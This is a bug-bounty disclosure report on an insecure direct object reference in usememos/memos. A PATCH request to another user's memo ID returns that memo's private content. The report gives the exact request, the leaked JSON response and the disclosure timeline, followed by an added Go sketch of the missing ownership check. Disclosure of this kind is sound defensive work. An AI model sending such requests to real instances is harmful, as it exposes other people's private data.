View the content of other users' private memos in usememos/memos

Valid

Reported on

Dec 23rd 2022


Description

A user can view the content of any other user's private memo via the API:

PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}

Proof of Concept

Log in to the website in browser 1 as user A. Log in to the website in browser 2 as user B. Example: user B has a private memo with id 8.

Using user A's session in browser 1, make the request:

PATCH /api/memo/8 HTTP/1.1

{"id":8,"rowStatus":"ARCHIVED"}

User A then gets the response:

{"data":{"id":8,"rowStatus":"ARCHIVED","creatorId":1,"createdTs":1671805207,"updatedTs":1671805219,"content":"demo content","visibility":"PRIVATE","pinned":false,"displayTs":1671805207,"creator":{"id":1,"rowStatus":"NORMAL","createdTs":1671803462,"updatedTs":1671803845,"username":"userB","role":"HOST","email":"","nickname":"userB","openId":"","userSettingList":null},"resourceList":[]}}

The content of the memo appears in the returned response: "content":"demo content"

Demo video: https://drive.google.com/file/d/1FYpaZlktndUk9fmoCy8q7PAPMOARBOE1/view

Impact

Anyone can read other people's memos.
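The ownership check whose absence the report describes, shown as an added example; this is not the project's code and not the fix commit. The Memo type, the in-memory memos store, patchMemo, send, the callerID parameter and the choice of a 404 response are all assumptions made for illustration.

```go
package main

import (
	"encoding/json"
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// Memo holds the fields seen in the response above (hypothetical type).
type Memo struct {
	ID         int    `json:"id"`
	RowStatus  string `json:"rowStatus"`
	CreatorID  int    `json:"creatorId"`
	Content    string `json:"content"`
	Visibility string `json:"visibility"`
}

// Constructed store: memo 8 is private and belongs to user 1 (userB).
var memos = map[int]*Memo{8: {8, "NORMAL", 1, "demo content", "PRIVATE"}}

// patchMemo serves PATCH /api/memo/{id} (path ID wins over body ID); callerID stands in
// for the session user. checkOwner=false reproduces the report; true rejects non-owners.
func patchMemo(w http.ResponseWriter, r *http.Request, callerID int, checkOwner bool) {
	var patch Memo
	err := json.NewDecoder(r.Body).Decode(&patch)
	if _, perr := fmt.Sscanf(r.URL.Path, "/api/memo/%d", &patch.ID); err != nil || perr != nil {
		http.Error(w, "bad request", http.StatusBadRequest)
		return
	}
	m, ok := memos[patch.ID]
	if !ok || (checkOwner && m.CreatorID != callerID) {
		// Same 404 for "missing" and "not yours", so no memo fields leak.
		http.Error(w, "not found", http.StatusNotFound)
		return
	}
	m.RowStatus = patch.RowStatus
	json.NewEncoder(w).Encode(map[string]*Memo{"data": m})
}

// send replays the request from the report as callerID; returns status and body.
func send(callerID int, checkOwner bool) (int, string) {
	req := httptest.NewRequest(http.MethodPatch, "/api/memo/8", strings.NewReader(`{"id":8,"rowStatus":"ARCHIVED"}`))
	rec := httptest.NewRecorder()
	patchMemo(rec, req, callerID, checkOwner)
	return rec.Code, rec.Body.String()
}

func main() { fmt.Println(send(2, true)) } // user A with the check: 404, no content
```

The check runs before the memo is modified or serialized, so a rejected request neither archives user B's memo nor echoes its content.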

We are processing your report and will contact the usememos/memos team within 24 hours. a year ago
A GitHub Issue asking the maintainers to create a SECURITY.md exists a year ago
Kevin Kien modified the report a year ago
Kevin Kien modified the report a year ago
We have contacted a member of the usememos/memos team and are waiting to hear back a year ago
STEVEN validated this vulnerability a year ago
Kevin Kien has been awarded the disclosure bounty
The fix bounty is now up for grabs
Kevin Kien
a year ago

Researcher


Can I get a CVE for this bug?

STEVEN marked this as fixed in 0.9.1 with commit 3556ae a year ago
STEVEN has been awarded the fix bounty
This vulnerability has been assigned a CVE
STEVEN published this vulnerability a year ago